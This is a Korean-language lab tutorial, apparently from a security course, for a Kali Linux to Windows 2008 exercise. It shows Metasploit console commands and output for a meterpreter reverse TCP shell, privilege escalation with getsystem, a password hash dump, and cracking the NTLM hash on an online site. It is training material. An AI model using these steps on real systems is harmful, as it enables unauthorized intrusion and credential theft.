본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.



[실습 시스템] Kali Linux, Firewall, Window2008



 - Reverse TCP를 이용하여 Window2008 제어권을 획득한 이후, Window2008 패스워드 해킹을 테스트한다.



[실습 단계]


스캔 -> 공격 타겟 선정 -> 백도어 구성 -> 공격 코드 파일 생성 -> 공격 타겟에 공격 코드 파일 유입 실시


-> 백도어 실행 -> 공격 코드 파일 실행 -> 제어권 획득 -> 패스워드 Hash Dump 실시 -> 크랙 사이트 이용




Ex1) Window2008 로그인 패스워드 변경


 - 실습을 하기 위해서 로그인 패스워드를 간단하게 변경하도록 한다. (패스워드 : 0000)


@ Window2008


 ① 시작 -> 관리도구 -> 로컬 보안 정책


 ② 보안 설정 -> 계정 정책 -> 암호 정책


 ③ "암호는 복잡성을 만족해야 함" -> 마우스 우클릭 -> 속성(R) -> "사용 안 함(S)' 체크 -> 확인


 ④ 시작 -> 관리도구 -> 컴퓨터 관리 -> 로컬 사용자 및 그룹 -> 사용자


 ⑤ 'Administrator' 선택 -> 마우스 우클릭 -> 암호 설정 -> 계속 -> 패스워드 '0000' 설정 -> 확인





Ex2) 백도어 'reverse_resource.rc' 실행


@ Kali Linux


root@kali:~# cd /root/bin

root@kali:~/bin# msfconsole -r reverse_resource.rc
[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.

[*] Started reverse TCP handler on

[*] Starting the payload handler...
msf exploit(handler) >





Ex3) Window2008 'reverse.exe' 공격 코드(악성 코드) 실행


@ Window2008






Ex4) 백도어 'reverse_resource.rc' 상태 확인


 - Window2008이 Kali Linux에 연결되었는지 확인한다.


@ Kali Linux


msf exploit(handler) >

[*] Sending stage (1188911 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-06-07 11:20:43 +0900


msf exploit(handler) > sessions -i

Active sessions

  Id  Type                   Information                      Connection
  --  ----                   -----------                      ----------
  1   meterpreter x64/win64  WIN2008\Administrator @ WIN2008 -> (



 - Window2008 제어권 획득 실시


msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...


meterpreter > sysinfo
Computer        : WIN2008
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/win64



meterpreter > getuid
Server username: WIN2008\Administrator


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f43109aa8336014a3cc6fc4322a81e05...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...


No users with password hints on this system


[*] Dumping password hashes...



meterpreter > exit
[*] Shutting down Meterpreter...

[*] - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) >
msf exploit(handler) > exit





Ex5) 패스워드 크랙 사이트를 이용하여 패스워드 크랙 실시


 - 패스워드 크랙 사이트 : http://hashkiller.co.uk


@Password Hash Dump 값.txt


@ 로컬 PC


Decrypter/Cracket -> NTLM Decrypter





Window2008 'Administrator' Hash Dump 입력 -> Submit 클릭





Administrator 로그인 패스워드 '0000' 확인




 - Window2008 원래 패스워드로 변경 실시





[참고] 윈도우 SAM 파일에 있는 패스워드 Hash 크랙 툴


 - 존더리퍼(John The Ripper), PWDump, Rainbow Crack

 - 'hashkiller.co.uk' 사이트는 복잡한 패스워드에 대해서 크랙 시간이 길거나 불가능하다.



